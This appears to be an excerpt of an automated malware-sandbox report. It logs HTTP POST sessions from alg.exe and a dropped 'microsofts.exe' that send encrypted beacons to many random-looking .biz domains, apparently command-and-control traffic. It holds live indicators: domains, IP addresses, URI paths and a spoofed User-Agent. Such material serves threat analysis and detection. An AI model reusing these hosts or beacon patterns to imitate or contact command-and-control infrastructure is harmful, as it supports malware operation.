Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.5 | 59562 | 13.251.16.150 | 80 | 1492 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:28.989689112 CET | 344 | OUT | POST /nw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qaynky.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:03:28.989715099 CET | 778 | OUT | Data Raw: 9f c0 52 67 bc 32 da 78 fe 02 00 00 06 87 97 ed 8e d1 49 a0 e8 aa f9 ae 12 6c 32 72 da 8c f8 ac f3 cb 36 b9 a0 bc 41 74 c1 a1 70 7e dd b4 81 97 ae d6 9d 77 a0 3e dc c3 fa 87 7d 11 6d 8b c3 be 0d 23 d2 e4 c4 70 de e5 47 84 b4 2b 7a 8f 57 c6 72 08
Data Ascii: Rg2xIl2r6Atp~w>}m#pG+zWrM+nloVfUIzs,2dPt<]KFRH&j*9]YW6A,iLnwOmnQZLN|FyR}o)9LhnfIw
Nov 5, 2024 17:03:30.456079960 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:03:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=7ada31002f6a76ab3f5be16937b945e2|173.254.250.76|1730822610|1730822610|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.5 | 59574 | 44.221.84.105 | 80 | 1492 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:31.969162941 CET | 349 | OUT | POST /daho HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: bumxkqgxu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:03:31.969263077 CET | 778 | OUT | Data Raw: fa 44 ef 46 6e df 7c c6 fe 02 00 00 ca ff 59 59 d9 63 a7 ec bb a5 a8 42 42 8b 67 68 8b cf e3 e8 2b 20 eb 77 cc be e5 c6 3b 6b bf 25 5b 2b 2d 7d e3 6a 09 21 8d 1b 25 c0 0b a1 65 1e aa bd a5 a1 bb a1 15 a1 a6 5c cf cd 21 54 7d 3a 32 cb d6 ed 71 d6
Data Ascii: DFn|YYcBBgh+ w;k%[+-}j!%e\!T}:2qmsA2)/T;(Y?\aS:wO&wt!`<}LZBp!dByQSK|=-%`vOnND? ['8ei?;1:.tqb:L2e0D
Nov 5, 2024 17:03:32.630348921 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:03:32 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=50b396ec84842dbc7b922d0fb8e1567f|173.254.250.76|1730822612|1730822612|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.5 | 59580 | 54.244.188.177 | 80 | 1492 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:32.828912020 CET | 347 | OUT | POST /txk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dwrqljrr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:03:32.828931093 CET | 778 | OUT | Data Raw: 3b 9d f8 d7 1a 9f 59 c0 fe 02 00 00 77 d9 14 74 f0 d6 38 02 5b cd 5a f4 3c 8b f3 28 bb ba fd 53 32 fe 52 04 e4 e2 e9 29 94 aa 5f f9 8d e6 10 df cc f7 03 56 f4 07 1e 0a f8 25 84 79 ce fd ca f4 73 ff 62 e1 c8 92 d8 02 ba 79 9b 5b 06 f1 b2 a1 22 cc
Data Ascii: ;Ywt8[Z<(S2R)_V%ysby["laY%_9j%^CF58^+I>oZwWt]p*?IVBfs-PU!=o_QuGT!5+j^!qa<
Nov 5, 2024 17:03:33.667948961 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:03:33 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=07359a273a73a0fc5e0d1296c0068790|173.254.250.76|1730822613|1730822613|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.5 | 59586 | 47.129.31.212 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:32.985902071 CET | 356 | OUT | POST /bcfyebuhgunon HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xlfhhhm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:03:32.985923052 CET | 828 | OUT | Data Raw: 1c 76 03 bf d3 68 27 a2 30 03 00 00 89 24 cd 86 21 27 a7 b5 1a 20 28 77 65 98 34 a5 2b 76 f3 0e 6f e3 7a 75 c4 ca 94 4e a2 86 36 97 de dc 4b 5e 2b cf fb 08 b0 82 69 7a 12 ef ae 4c a6 56 39 98 38 43 fb c4 de 72 d8 25 92 0c a0 ac 38 c0 4b 36 82 72
Data Ascii: vh'0$!' (we4+vozuN6K^+izLV98Cr%8K6rnAU&$dh9Pru95*O~:[Dy@zygL^riYu<qL0kaK0AGtj]D!FRuqH]YVrY+2!CR]\b
Nov 5, 2024 17:03:34.413471937 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:03:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=31fe77a86b4e64a8b42891334e59ca95|173.254.250.76|1730822614|1730822614|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.5 | 59592 | 35.164.78.200 | 80 | 1492 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:33.999886990 CET | 351 | OUT | POST /vvpppdyli HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: nqwjmb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:03:33.999911070 CET | 778 | OUT | Data Raw: 42 cd 73 9d ff a6 fb 0f fe 02 00 00 33 36 cb d3 14 68 79 a4 c9 c1 ba ab ff 70 ad fd 03 28 ad 54 a6 35 76 b6 cd d7 ce b0 7e 5e f9 4c ea 1e 57 52 39 4b a9 11 78 2f 7f 29 bd fb 57 61 b1 6f 3a 40 3a e1 86 2c 04 17 eb e1 72 b9 ca 66 c7 8e 3f 31 d4 2d
Data Ascii: Bs36hyp(T5v~^LWR9Kx/)Wao:@:,rf?1-\eq_]8UZsj%33&ihGZ k/H6u;)3G>=|Kc]P-*O)i6QS%u!'?:;M]i=<yT 4T_#5="
Nov 5, 2024 17:03:34.824301958 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:03:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=647ca644de4696c438ee1e927eb9a508|173.254.250.76|1730822614|1730822614|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.5 | 59593 | 13.251.16.150 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:34.459052086 CET | 348 | OUT | POST /wyuhsg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ifsaia.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:03:34.459069967 CET | 828 | OUT | Data Raw: 16 f2 f0 f3 e6 47 e6 71 30 03 00 00 ca ff e6 4a bd 65 96 fb 5a 7d 4e 1c e8 f5 79 dc b5 b2 7e eb 2e e9 dd 64 af aa 72 63 31 eb a1 a3 21 d6 e3 33 2e cd e9 2f 33 40 0f ca 83 d7 f6 a9 77 22 94 32 c2 a3 6e 88 cc 88 28 3d 7e d9 07 b1 54 f9 e6 9e e6 b3
Data Ascii: Gq0JeZ}Ny~.drc1!3./3@w"2n(=~TH/4V2;OdrjncMS$"y,)W>XU3+.08{A\*@i75j]'cI-tnq~5$$l~cZL:{!DZdoTNeFY.
Nov 5, 2024 17:03:35.878051043 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:03:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=32ce63649b2fb1c6b045dc2d75e0cd03|173.254.250.76|1730822615|1730822615|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
39          192.168.2.5  59599        3.94.10.34      80                1492  C:\Windows\System32\alg.exe

Timestamp                           Bytes transferred  Direction  Data
Nov 5, 2024 17:03:35.019838095 CET  358                OUT        POST /fgdugwxcbebce HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: ytctnunms.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 5, 2024 17:03:35.019853115 CET  778                OUT        Data Raw: 83 f2 3e c3 67 96 a6 cb fe 02 00 00 e1 00 e8 25 9d 3a cb 4a 33 35 25 a2 14 49 77 5c e5 88 59 a6 06 7c 8c 64 fa ff 65 ab 38 26 19 31 fa ab f8 dc 5e fe 0f 01 0c a8 7a 94 05 1e 12 0e 76 0c 41 dd c9 5d f2 eb 49 46 50 7a 31 47 aa 5f a5 30 24 b5 3c 10
    Data Ascii: >g%:J35%Iw\Y|de8&1^zvA]IFPz1G_0$<(A|w,U_%h_fjgKW[J8t*s31iVkxLomw=C?^"'|j*sM4i35I}6KAeP
Nov 5, 2024 17:03:35.692034006 CET  417                IN         HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:03:35 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=5ba3b748ac47479a56ed259b42fa3597|173.254.250.76|1730822615|1730822615|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
40          192.168.2.5  59604        165.160.15.20   80                1492  C:\Windows\System32\alg.exe

Timestamp                           Bytes transferred  Direction  Data
Nov 5, 2024 17:03:36.533978939 CET  352                OUT        POST /ahktjonxxxw HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: myups.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 5, 2024 17:03:36.534085989 CET  778                OUT        Data Raw: 56 db ba 87 d4 01 b1 ab fe 02 00 00 25 a2 c6 47 b9 50 13 e6 cc 1c f6 df f1 81 89 52 62 65 38 b3 12 db e1 04 d6 86 f3 13 60 32 4c a7 95 32 3b 0f d7 df b7 3c f9 08 dd 10 e7 33 74 d7 d8 fe 41 b0 df 10 61 b8 56 da 43 e4 98 b0 4f ed 3e 25 ea 2c 5a 34
    Data Ascii: V%GPRbe8`2L2;<3tAaVCO>%,Z4c}[T_sp)("Qd!Mb:0_J?Z[$@)s9kSTw7gXh~Vd|3lD9&:UV+7iz+Ed~G//.#
Nov 5, 2024 17:03:37.233697891 CET  170                IN         HTTP/1.1 200 OK
    Date: Tue, 05 Nov 2024 16:03:37 GMT
    Content-Length: 94
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
Nov 5, 2024 17:03:37.267164946 CET  345                OUT        POST /mwix HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: myups.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 5, 2024 17:03:37.267232895 CET  778                OUT        Data Raw: e8 54 2a 84 4f 18 34 ab fe 02 00 00 aa 72 5e 55 04 e6 8d 9a 73 b0 1d 7a 01 d4 65 ea 4a bb 05 3e 70 cf a1 6a 9c 62 e4 10 52 ab 75 d6 d7 a0 2e 99 81 09 11 b7 04 5a 43 07 a2 68 c5 35 85 35 76 1f d3 63 8a f5 16 f1 c1 d2 61 b8 e2 c3 f0 7e 36 b6 b3 de
    Data Ascii: T*O4r^UszeJ>pjbRu.ZCh55vca~6w)K; 7*CT$?K7lDBjgn?mp[?m+nRs2bN=GM$\UTNd89?>#Z~,P!z59fFYQ
Nov 5, 2024 17:03:37.442312002 CET  170                IN         HTTP/1.1 200 OK
    Date: Tue, 05 Nov 2024 16:03:37 GMT
    Content-Length: 94
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
41          192.168.2.5  59605        44.221.84.105   80                1816  C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp                           Bytes transferred  Direction  Data
Nov 5, 2024 17:03:36.551304102 CET  358                OUT        POST /fcdeynfdvmpui HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: saytjshyf.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Nov 5, 2024 17:03:36.551331997 CET  828                OUT        Data Raw: 0c 9e fd 8e fe b4 31 c9 30 03 00 00 e6 9a 4a cc 1d 08 92 53 21 7a b6 45 71 1a 69 7e 3f c4 59 1c 27 d6 4e f3 42 46 95 81 74 6f 71 c0 c5 da aa 66 90 47 2d 0a 9b 7f 86 57 e2 16 48 da 9f 8f a6 85 61 31 bc 78 71 2e 11 84 22 b9 88 5c af 78 3b ff 84 bf
    Data Ascii: 10JS!zEqi~?Y'NBFtoqfG-WHa1xq."\x;Qt-}C45w??pyM [MeHMAz 5i/2A~C <G0*r'6<T`y,dv|}$vfKicvy"wS%Yvc
Nov 5, 2024 17:03:37.215595007 CET  417                IN         HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:03:37 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=ecca10035d8f4172a8d15f2dddcc1bc6|173.254.250.76|1730822617|1730822617|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 42 | Source IP: 192.168.2.5 | Source Port: 59611 | Destination IP: 18.141.10.107 | Destination Port: 80 | PID: 1816 | Process: C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp: Nov 5, 2024 17:03:37.252228022 CET | Bytes transferred: 349 | Direction: OUT | Data:
POST /ucfcvy HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vcddkls.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828

Timestamp: Nov 5, 2024 17:03:37.252252102 CET | Bytes transferred: 828 | Direction: OUT | Data:
Data Raw: 55 76 88 1e 68 1a 45 2f 30 03 00 00 62 23 8b 06 43 0a fb da cc 2a d2 8e 67 e1 60 d5 e1 9f 5a 97 d1 ad 1a a8 8e 0e 66 17 7d 7b e0 3a 65 90 b5 38 1a b7 ae bc 13 d0 86 03 e9 b2 ed e8 74 64 0b da 20 f7 fa 4a 4e ce 8c 50 4c 23 ea 96 fa b0 87 dd 2b 88
Data Ascii: UvhE/0b#C*g`Zf}{:e8td JNPL#+;C|7lVlLbn"if$kW3o,>Reoq:#dhvMZ&h26"5' 8M=u.m9jeHe8@Cg1}_nduI

Timestamp: Nov 5, 2024 17:03:38.694000959 CET | Bytes transferred: 415 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:03:38 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=bd0611826cd168bd3e0e464a05ab9d5c|173.254.250.76|1730822618|1730822618|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 43 | Source IP: 192.168.2.5 | Source Port: 59618 | Destination IP: 54.244.188.177 | Destination Port: 80 | PID: 1492 | Process: C:\Windows\System32\alg.exe

Timestamp: Nov 5, 2024 17:03:37.643802881 CET | Bytes transferred: 357 | Direction: OUT | Data:
POST /exvjfnyxjxwq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: oshhkdluh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Timestamp: Nov 5, 2024 17:03:37.643973112 CET | Bytes transferred: 778 | Direction: OUT | Data:
Data Raw: 10 1c d2 4c 78 d7 07 c3 fe 02 00 00 3e 56 37 3c bf 92 50 4b c2 a2 d9 d6 4a 59 e6 58 c9 e8 9b 48 78 a7 92 ea ee 6e 6c f5 a5 82 89 e2 cc 87 88 90 02 bd e7 f1 ef cf 80 12 7f f3 2c 83 45 bc c1 dc 3a b0 8f cf a9 91 fb 3f 5d 3f 61 62 2f 85 6d 17 d6 b5
Data Ascii: Lx>V7<PKJYXHxnl,E:?]?ab/mm%.LlMK=o!2C >QbOgs_$bUK3p!&i{pf?Zn>sl?NK;xVGhP/<8D

Timestamp: Nov 5, 2024 17:03:38.476537943 CET | Bytes transferred: 417 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:03:38 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=20ee0628a228bb5fed2eddbe4151fe49|173.254.250.76|1730822618|1730822618|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 44 | Source IP: 192.168.2.5 | Source Port: 59624 | Destination IP: 172.234.222.143 | Destination Port: 80 | PID: 1816 | Process: C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp: Nov 5, 2024 17:03:38.741274118 CET | Bytes transferred: 355 | Direction: OUT | Data:
POST /pclybqvqlknkyp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fwiwk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828

Timestamp: Nov 5, 2024 17:03:38.741306067 CET | Bytes transferred: 828 | Direction: OUT | Data:
Data Raw: 3d 24 e7 e4 0f 5c 77 ce 30 03 00 00 44 6a d5 3e b8 91 76 c6 e8 be aa 1c c3 d0 22 1a 28 1b e4 ba 1b f0 d8 c7 c1 92 9a f5 bc cf ff 28 93 e0 85 d3 a2 06 04 dd 89 0c 62 28 91 25 a4 fa 79 21 4d cc 32 95 f3 fd 60 30 32 7a 84 04 b1 a5 c2 99 97 db 08 f0
Data Ascii: =$\w0Dj>v"((b(%y!M2`02z^zrw>J3h4Q_i-s2E?s(kt%|E!@Z]XZcd`r-PzoEEFi&[h5L=PAcwYg{E+


Session ID: 45 | Source IP: 192.168.2.5 | Source Port: 59625 | Destination IP: 208.100.26.245 | Destination Port: 80 | PID: 1492 | Process: C:\Windows\System32\alg.exe

Timestamp: Nov 5, 2024 17:03:38.805493116 CET | Bytes transferred: 350 | Direction: OUT | Data:
POST /bmriyxm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yunalwv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Timestamp: Nov 5, 2024 17:03:38.805493116 CET | Bytes transferred: 778 | Direction: OUT | Data:
Data Raw: 1a 49 16 12 a8 35 d1 a4 fe 02 00 00 79 92 55 bd eb 27 3e 18 1f 19 bd 82 5d ac 55 c8 87 b4 00 b3 78 0f 18 6a 31 02 99 96 9c 0e 94 41 59 2e e1 0a c8 0f e4 bf a1 5a 04 12 f5 40 f9 0c e5 fe 86 e0 02 47 f4 b4 57 42 e1 8c 14 6e 31 e4 6e fb 16 f7 7d 83
Data Ascii: I5yU'>]Uxj1AY.Z@GWBn1n}g_f'T(~^`=olng0W&OJ+hJ[;X%s)`6^ c?:-!J/[[Q)mPBNsG<`w!

Timestamp: Nov 5, 2024 17:03:39.440380096 CET | Bytes transferred: 744 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page 